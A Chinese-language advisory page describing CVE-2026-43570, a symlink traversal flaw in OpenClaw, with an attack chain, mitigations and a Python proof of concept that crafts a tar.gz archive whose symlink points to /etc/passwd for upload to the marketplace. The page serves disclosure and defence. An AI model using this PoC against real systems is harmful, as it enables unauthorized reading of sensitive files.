CVE-2026-43570 CVSS 6.5 中危

CVE-2026-43570 OpenClaw符号链接遍历漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43570

漏洞类型

符号链接遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.22至2026.4.5之前的版本中存在符号链接遍历漏洞。该漏洞源于远程市场仓库路径处理逻辑缺陷，攻击者可利用精心构造的符号链接路径绕过仓库根目录限制，访问预期目录之外的文件，导致敏感信息泄露。

技术细节

该漏洞位于OpenClaw处理远程市场仓库路径的组件中。当用户处理来自远程的仓库时，程序未对压缩包或路径中的符号链接进行充分的安全校验。攻击者可以创建一个恶意的仓库，其中包含指向预期根目录之外（如系统敏感目录）的符号链接。当OpenClaw解析并跟随这些符号链接时，由于缺乏有效的路径规范化或沙箱限制，攻击者可以成功“逃逸”出仓库的根目录。利用此漏洞需要用户交互（如下载或解析该恶意仓库），攻击者无需预先认证即可读取服务器上的敏感文件，造成机密性泄露。

攻击链分析

STEP 1

1. 制作恶意仓库

攻击者创建包含恶意符号链接的仓库文件，该链接指向系统敏感目录（如/etc/passwd）。

STEP 2

2. 投放恶意文件

攻击者将恶意仓库上传至远程市场或诱导受害者使用OpenClaw访问该仓库地址。

STEP 3

3. 触发漏洞

受害者使用OpenClaw下载并处理该仓库，程序在解析路径时跟随符号链接。

STEP 4

4. 读取敏感文件

OpenClaw绕过根目录限制，成功读取并返回预期目录之外的敏感文件内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import tarfile

def create_malicious_repo():
    """
    Creates a malicious tar.gz archive containing a symlink.
    This PoC demonstrates how to craft a repository that escapes the root.
    """
    filename = "exploit_repo.tar.gz"
    
    with tarfile.open(filename, "w:gz") as tar:
        # Create a TarInfo object for the symlink
        info = tarfile.TarInfo(name="repo_root/payload")
        info.type = tarfile.SYMTYPE
        # The symlink points to a sensitive file outside the repository root
        info.linkname = "../../../../etc/passwd"
        
        # Add the symlink to the archive
        tar.addfile(info)
    
    print(f"[+] Created malicious repository: {filename}")
    print("[+] Upload this to the marketplace or host it for OpenClaw to process.")

if __name__ == "__main__":
    create_malicious_repo()

影响范围

OpenClaw 2026.3.22

OpenClaw < 2026.4.5

防御指南

临时缓解措施

在官方补丁发布前，建议用户不要从不可信来源下载或处理OpenClaw仓库。管理员应限制OpenClaw进程的文件系统访问权限（如使用容器或chroot环境），并监控系统异常的文件读取行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表